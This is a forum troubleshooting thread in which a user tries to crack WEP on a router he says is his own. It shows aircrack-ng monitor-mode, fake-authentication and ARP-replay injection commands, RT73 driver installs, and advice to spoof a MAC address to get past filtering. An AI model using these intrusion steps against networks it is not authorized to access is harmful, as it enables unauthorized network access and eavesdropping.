    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1
    iwpriv rausb0 rfmontx 1
    iwconfig rausb0 mode monitor
    airmon-ng start rausb0 8
    airodump-ng rausb0

    gives my router:
    essid: router1
    bssid: 00:40:2a........
    pwr: 82
    beacons: 22
    # data: 9
    #/s : 0
    ch: 8
    MB: 22
    ENC: WEP
    CIPHER: WEP
    AUTH:

    so then I:
    airodump-ng -c 8 -w file --bssid MAC -h MYMAC rausb0
    aireplay-ng -1 0 -a MAC -h MYMAC -e ESSID rausb0

Waiting for beacon frame (BSSID: .....)
    sending authentication request
    AP rejects open-system authentication
    please specify PRGA-file (-y)

    ???????????

Then I unplugged my network card
    put in my thumb drive
    DRIVERS 1.1.0

    make
    make install
    modprobe rt73

then plugged in USB network card
    ifconfig rausb0 up
iwconfig rausb0 mode monitor channel 8 rate 1M

    then the same thing: aireplay-ng -1 0 -e ... -a ... -h ... rausb0

    AP rejects open-system authentication
    please specify PGRA file
    ???

    Then:
    aireplay-ng -9 rausb0
    injection is working!
    found 1 ap

Never come across this before?? But it dosn't sound like your USB dongle it sounds like your AP is rejecting the packets.

    AP rejects open-system authentication

macchange your card to an authorized mac , that means mac filtering is enabled...........

or it could be SKA authentification, and i posted a solution for ska authentification in wep spoonfeeder thread in programming corner......
Watch your back, your packetz will belong to me soon... xD

I changed my router to open authentication

I am now using rt73 drivers VERSION 2.0
    aircrack suite 0.9.1

I can associate with the router
    but when I

    aireplay-ng -3 -b MAC -h MYMAC rausb0

You should also start airodump-ng to capture replies.

I hate to double post, but it seems I have tried:

    BT2 unpatched
    0.9.1
    and 1.0 DEV

    with every combo of drivers:

    default
    1.1
    2.0

    and nothing seems to work.
    I am using RT73 linksys wusb54gc
Anyone got a good combination of aircrack suite release / drivers that work well for them on the RT73 cards?

    @dzapffe19

Hi i am using the same linksys adapter

i was having the Authentication failed with v1.1 then i was getting the write failed msg with v2 the same as you, but i have found if i install v1.1 then v2 it works great! this is with aircrack v.9 and 1.0beta 1. both using livecd and a full hd install.

    hope this helps

What were the commands you used to install 1.1 then v2?
Did you remove 1.1 then install 2?

    Normally I would:
    ifconfig rausb0 down
    rmmod rt73
    make and make install
    modprobe rt73
    ***plug in device***
ifconfig rausb0 up iwconfig rausb0 mode monitor

What steps should I modify if I am going to install 1.1, then 2.0?
Should I just repeat the procedure twice (first w/ 1.1 then w/ v2???)

    I installed 1.1 drivers, then 2.0 drivers
I could now associate with the AP !!!!!!!!!!!!!!!!

But when I try a -3 attack, I got 50 ARP requests really quickly, but now it slowed down to about 1 ARP / min.
Why is it going so slow?
Edit: IVS started at 8, will not increase
    Injection possibly not working?
aircrack-ng -9 rausb0 yields that injection does work though...

    Using RT73 2.0 drivers
    airsuite 1.0 beta DEV

My router has one person connected, no traffic, pinging 192.168.0.2 (an invalid address) continuously
    Card is RT73 linksus wusb54gc
rate 1M mode monitor channel 8
    iwpriv forceprism 1

    router is d link 614+ 802.11 b 64 bit WEP open auth
